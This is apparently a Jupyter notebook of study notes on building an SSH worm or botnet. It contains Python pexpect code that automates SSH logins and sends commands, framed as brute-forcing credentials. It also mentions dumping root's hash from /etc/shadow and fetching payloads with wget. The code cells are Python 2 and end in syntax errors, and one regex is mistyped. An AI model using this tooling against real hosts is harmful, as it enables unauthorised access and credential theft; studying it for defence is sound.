# Building an SSH BotNet:
----
In 1988, RSH provided an excellent (although not very secure) method for a system administrator to remotely connect to a machine and manage it by performing a series of terminal commands on the host

Secure Shell (SSH) protocol has since replaced RSH by combining RSH with a public-key cryptographic scheme

this does very little to stop the same attack vector by forcing out common user names and passwords
SSH Worms have proven to be very successful and common attack vectors

the attacker has attempted to connect to the machine using the accounts ucla, oxford, and matrix. These are interesting choices

`cat /var/log/auth.log` 

Lets implement our own automated SSH Worm that brute forces user credentials against a target
our script must be able to wait and match for an expected output before sending further input commands


to connect to our SSH machine at IP Address, 127.0.0.1,`ssh root@127.0.0.1` the application first asks us to confirm the RSA key fingerprint. In this case, we must answer, “yes” before executing our command `uname –v` to determine the kernel version running on our target

`Pexpect` has the ability to interact with programs, watch for expected outputs, and then respond based on expected outputs

an excellent tool of choice for automating the process of brute forcing SSH user credentials


In [6]:
PROMPT = ['#', '>>>', ',', '\$']


In [11]:
# use a separate function command() to send commands to the SSH session. The function command() takes an SSH session and command string as input

# After catching the command prompt, it prints this output from the SSH session.


# we now have a script that can connect and control the SSH session interactively
def send_command(child,cmd):
    child.sendline(cmd)
    child.expect(PROMPT)
    print child.before

SyntaxError: Missing parentheses in call to 'print'. Did you mean print(child.before)? (<ipython-input-11-c4e811d73e51>, line 10)

Examine the function `connect()`. This function takes a username, hostname, and password and returns an SSH connection the pexpect library, it then waits for an expected output


In [10]:
# Three possible expected outputs can occur—a timeout, a message indicating that the host has a new public key, 
# or a password prompt

# timeout occurs, then the session.expect() method returns to zero

#If the child.expect() method catches the ssh_newkey message, it returns a 1. 
# This forces the function to send a message ‘yes'

def connect(user, host, password):
    ssh_newkey = 'Are you sure you want to continue connecting'
    connStr = 'ssh ' + user + '@' + host
    child = pexpect.spawn(connStr)
    ret = child.expect([pexpect.TIMEOUT, ssh_newkey, '[P|p}assword:'])
    if ret == 0:
        print '[-] Error Connecting'
        return
    if ret == 1:
        child.sendline('yes')
        ret = child.expect([pexpect.TIMEOUT, '[P|p]assword:'])
    if ret == 0: 
        print '[-] Error Connecting'
        return
    child.sendline(password)
    child.expect(PROMPT)
    return child

SyntaxError: Missing parentheses in call to 'print'. Did you mean print('[-] Error Connecting')? (<ipython-input-10-12ace762596b>, line 15)


While we ran the simple command to displaying the hashed password for the root user from /etc/shadow file, we could use the tool to something more devious like using wget

